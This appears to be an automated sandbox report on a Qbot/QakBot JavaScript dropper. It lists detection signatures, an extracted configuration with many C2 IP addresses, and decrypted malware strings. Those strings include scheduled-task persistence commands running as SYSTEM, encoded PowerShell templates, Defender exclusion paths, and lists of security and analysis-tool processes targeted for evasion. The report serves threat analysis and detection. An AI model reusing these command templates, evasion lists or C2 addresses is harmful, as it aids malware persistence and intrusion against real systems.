Windows Analysis Report
ProjectFunding_450726_Jun01.js

Overview

General Information

Sample Name: ProjectFunding_450726_Jun01.js
Analysis ID: 880006
MD5: a657553449746c482dacfe3b19119b7a
SHA1: 630b815d443f8f7ef7e4c4c7c100de1cd8a7ed53
SHA256: 44e029dd6210c4906a82e1f16dd5ebed434efd225dafb92fc560e6ff6d1ee948
Tags: js
Infos:

Detection

Qbot
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Qbot
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Sample uses string decryption to hide its real strings
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
Java / VBScript file with very long strings (likely obfuscated code)
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Launches processes in debugging mode, may be used to hinder debugging
Checks for available system drives (often done to infect USB drives)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Name Description Attribution Blogpost URLs Link
QakBot, qbotQbot QBot is a modular information stealer also known as Qakbot or Pinkslipbot. It has been active for years since 2007. It has historically been known as a banking Trojan, meaning that it steals financial data from infected systems, and a loader using C2 servers for payload targeting and download.
  • GOLD CABIN
 https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot

AV Detection
barindex
Found malware configuration
Source: 00000004.00000002.400000830.0000000000ECA000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Qbot {"Bot id": "obama266", "Campaign": "1685611378", "Version": "404.1346", "C2 list": ["24.234.220.88:990", "70.28.50.223:2078", "96.56.197.26:2083", "103.123.223.133:443", "83.249.198.100:2222", "199.27.66.213:443", "90.104.151.37:2222", "94.204.202.106:443", "72.205.104.134:443", "65.95.141.84:2222", "70.28.50.223:2078", "82.131.141.209:443", "77.126.99.230:443", "71.38.155.217:443", "205.237.67.69:995", "84.215.202.8:443", "24.234.220.88:465", "76.178.148.107:2222", "116.74.163.130:443", "70.28.50.223:2087", "147.147.30.126:2222", "173.88.135.179:443", "103.140.174.20:2222", "77.86.98.236:443", "92.149.250.113:2222", "96.87.28.170:2222", "86.168.210.41:443", "176.142.207.63:443", "12.172.173.82:32101", "86.132.236.117:443", "70.50.83.216:2222", "161.142.103.187:995", "45.62.70.33:443", "12.172.173.82:465", "178.175.187.254:443", "83.110.223.61:443", "105.184.209.194:995", "41.186.88.38:443", "102.156.10.183:443", "27.109.19.90:2078", "47.205.25.170:443", "12.172.173.82:993", "76.170.252.153:995", "69.242.31.249:443", "24.234.220.88:995", "125.99.69.178:443", "79.168.224.165:2222", "75.143.236.149:443", "14.192.241.76:995", "124.122.47.148:443", "81.229.117.95:2222", "98.145.23.67:443", "114.143.176.236:443", "103.144.201.48:2078", "122.186.210.254:443", "69.160.121.6:61201", "12.172.173.82:21", "72.253.126.216:443", "75.109.111.89:443", "76.86.31.59:443", "116.120.145.170:995", "12.172.173.82:50001", "81.101.185.146:443", "201.244.108.183:995", "68.203.69.96:443", "103.139.242.6:443", "103.42.86.42:995", "85.61.165.153:2222", "76.16.49.134:443", "125.99.76.102:443", "184.182.66.109:443", "70.28.50.223:32100", "50.68.204.71:993", "85.57.212.13:3389", "41.227.190.59:443", "70.28.50.223:3389", "31.53.29.235:2222", "89.79.229.50:443", "50.68.186.195:443", "47.199.241.39:443", "93.147.235.8:443", "75.141.227.169:443", "45.243.142.31:995", "79.92.15.6:443", "85.104.105.67:443", "89.129.109.27:2222", "86.176.83.44:2222", "24.234.220.88:993", "89.32.156.5:995", "12.172.173.82:22", "103.101.203.177:443", "70.28.50.223:2083", "98.187.21.2:443", "70.49.205.198:2222", "96.56.197.26:2222", "92.9.45.20:2222", "86.195.14.72:2222", "172.115.17.50:443", "100.4.163.158:2222", "80.12.88.148:2222", "213.64.33.92:2222", "113.11.92.30:443", "78.192.109.105:2222", "47.34.30.133:443", "122.184.143.86:443", "198.2.51.242:993", "165.120.169.171:2222", "88.126.94.4:50000", "82.125.44.236:2222", "117.195.17.148:993", "147.219.4.194:443", "80.167.196.79:443", "92.154.17.149:2222", "184.181.75.148:443", "95.45.50.93:2222", "84.35.26.14:995", "201.143.215.69:443", "12.172.173.82:2087", "50.68.204.71:443", "64.121.161.102:443"]}
Sample uses string decryption to hide its real strings
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: error res='%s' err=%d len=%u
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: netstat -nao
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: runas
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ipconfig /all
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: net localgroup
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: nltest /domain_trusts /all_trusts
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Microsoft
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SELF_TEST_1
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: p%08x
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Self test FAILED!!!
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Self test OK.
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: /t5
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: whoami /all
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: cmd
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: microsoft.com,google.com,cisco.com,oracle.com,verisign.com,broadcom.com,yahoo.com,xfinity.com,irs.gov,linkedin.com
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ERROR: GetModuleFileNameW() failed with error: ERROR_INSUFFICIENT_BUFFER
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: route print
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: .lnk
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: "%s\system32\schtasks.exe" /Create /ST %02u:%02u /RU "NT AUTHORITY\SYSTEM" /SC ONCE /tr "%s" /Z /ET %02u:%02u /tn %s
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: arp -a
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %s "$%s = \"%s\"; & $%s"
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: net share
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: cmd.exe /c set
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Self check
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %u;%u;%u;
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: /c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ProfileImagePath
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: at.exe %u:%u "%s" /I
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ProgramData
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Self check ok!
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: powershell.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: qwinsta
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: net view
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%s
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Component_08
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Start screenshot
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: schtasks.exe /Delete /F /TN %u
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: appidapi.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %s \"$%s = \\\"%s\\\\; & $%s\"
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: c:\ProgramData
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Component_07
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: bUdiuy81gYguty@4frdRdpfko(eKmudeuMncueaN
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: powershell.exe -encodedCommand %S
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ERROR: GetModuleFileNameW() failed with error: %u
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: powershell.exe -encodedCommand
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SoNuce]ugdiB3c[doMuce2s81*uXmcvP
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: \System32\WindowsPowerShell\v1.0\powershell.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: schtasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /SC ONSTART /TN %u /TR "%s" /NP /F
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: error res='%s' err=%d len=%u
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: netstat -nao
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: runas
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ipconfig /all
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %u.%u.%u.%u.%u.%u.%04x
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\explorer.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SystemRoot
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: cscript.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: MBAMService.exe;mbamgui.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\xwizard.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\wermgr.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: AvastSvc.exe;aswEngSrv.exe;aswToolsSvc.exe;afwServ.exe;aswidsagent.exe;AvastUI.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: C:\INTERNAL\__empty
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: .dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Win32_PhysicalMemory
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ALLUSERSPROFILE
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: image/jpeg
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: LocalLow
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: displayName
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: shlwapi.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\WerFault.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: CommandLine
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: {%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: kernel32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SubmitSamplesConsent
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: 1234567890
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: wbj.go
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\wextract.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Win32_DiskDrive
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: vkise.exe;isesrv.exe;cmdagent.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: System32
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Name
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\WerFault.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: WRSA.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: c:\\
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SpyNetReporting
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: FALSE
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: aswhookx.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Packages
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SonicWallClientProtectionService.exe;SWDash.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: application/x-shockwave-flash
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Sophos UI.exe;SophosUI.exe;SAVAdminService.exe;SavService.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: RepUx.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\mspaint.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Winsta0
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: CynetEPS.exe;CynetMS.exe;CynetConsole.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\wermgr.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: avp.exe;kavtray.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: root\SecurityCenter2
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\backgroundTaskHost.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: MsMpEng.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\CertEnrollCtrl.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: userenv.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: csc_ui.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: frida-winjector-helper-32.exe;frida-winjector-helper-64.exe;tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe;qak_proxy;dumpcap.exe;CFF Explorer.exe;not_rundll32.exe;ProcessHacker.exe;tcpview.exe;filemon.exe;procmon.exe;idaq64.exe;loaddll32.exe;PETools.exe;ImportREC.exe;LordPE.exe;SysInspector.exe;proc_analyzer.exe;sysAnalyzer.exe;sniff_hit.exe;joeboxcontrol.exe;joeboxserver.exe;ResourceHacker.exe;x64dbg.exe;Fiddler.exe;sniff_hit.exe;sysAnalyzer.exe;BehaviorDumper.exe;processdumperx64.exe;anti-virus.EXE;sysinfoX64.exe;sctoolswrapper.exe;sysinfoX64.exe;FakeExplorer.exe;apimonitor-x86.exe;idaq.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: \\.\pipe\
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: pstorec.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: NTUSER.DAT
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: from
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\sethc.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: netapi32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\Utilman.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: gdi32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: setupapi.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SELECT * FROM Win32_Processor
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: iphlpapi.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Caption
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: CrAmTray.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ccSvcHst.exe;NortonSecurity.exe;nsWscSvc.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Win32_ComputerSystem
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\backgroundTaskHost.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %ProgramFiles%\Internet Explorer\iexplore.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: user32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: xagtnotif.exe;AppUIMonitor.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\dxdiag.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SentinelServiceHost.exe;SentinelStaticEngine.exe;SentinelAgent.exe;SentinelStaticEngineScanner.exe;SentinelUI.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: \sf2.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\grpconv.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: egui.exe;ekrn.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Software\Microsoft
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %S.%06d
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: bcrypt.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SELECT * FROM AntiVirusProduct
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\SndVol.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\explorer.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\Utilman.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SOFTWARE\Microsoft\Windows Defender\SpyNet
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: wtsapi32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\xwizard.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: shell32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: TRUE
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Win32_Bios
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SELECT * FROM Win32_OperatingSystem
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\mobsync.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: c:\hiberfil.sysss
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: */*
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\AtBroker.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: abcdefghijklmnopqrstuvwxyz
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ByteFence.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: type=0x%04X
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: snxhk_border_mywnd
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ROOT\CIMV2
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: dwengine.exe;dwarkdaemon.exe;dwwatcher.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: https
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\explorer.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: fshoster32.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: kernelbase.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: regsvr32.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %s\system32\
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\dxdiag.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Win32_Process
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: rundll32.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: LOCALAPPDATA
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: cmd.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: APPDATA
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: select
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: .exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: mcshield.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: advapi32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ws2_32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: .cfg
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: aabcdeefghiijklmnoopqrstuuvwxyyz
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Win32_Product
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: WQL
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: wininet.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: LastBootUpTime
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: S:(ML;;NW;;;LW)
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\CertEnrollCtrl.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: urlmon.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Create
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Win32_PnPEntity
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\grpconv.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Initializing database...
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\SearchIndexer.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: winsta0\default
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: .dat
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: WBJ_IGNORE
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: next
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\AtBroker.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: wpcap.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\sethc.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: image/pjpeg
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: fmon.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: bdagent.exe;vsserv.exe;vsservppl.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\SndVol.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: vbs
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: aswhooka.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SysWOW64
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\mspaint.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: mpr.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: image/gif
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: crypt32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ntdll.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: open
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\explorer.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: CSFalconService.exe;CSFalconContainer.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\wextract.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\mobsync.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\SearchIndexer.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %u.%u.%u.%u.%u.%u.%04x
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\explorer.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SystemRoot
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: cscript.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: MBAMService.exe;mbamgui.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\xwizard.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\System32\wermgr.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: AvastSvc.exe;aswEngSrv.exe;aswToolsSvc.exe;afwServ.exe;aswidsagent.exe;AvastUI.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: C:\INTERNAL\__empty
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: .dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Win32_PhysicalMemory
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: ALLUSERSPROFILE
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: image/jpeg
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: LocalLow
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: displayName
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: shlwapi.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\WerFault.exe
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: CommandLine
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: {%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: kernel32.dll
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: SubmitSamplesConsent
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: 1234567890
Source: 4.2.rundll32.exe.fd0000.1.unpack String decryptor: wbj.go
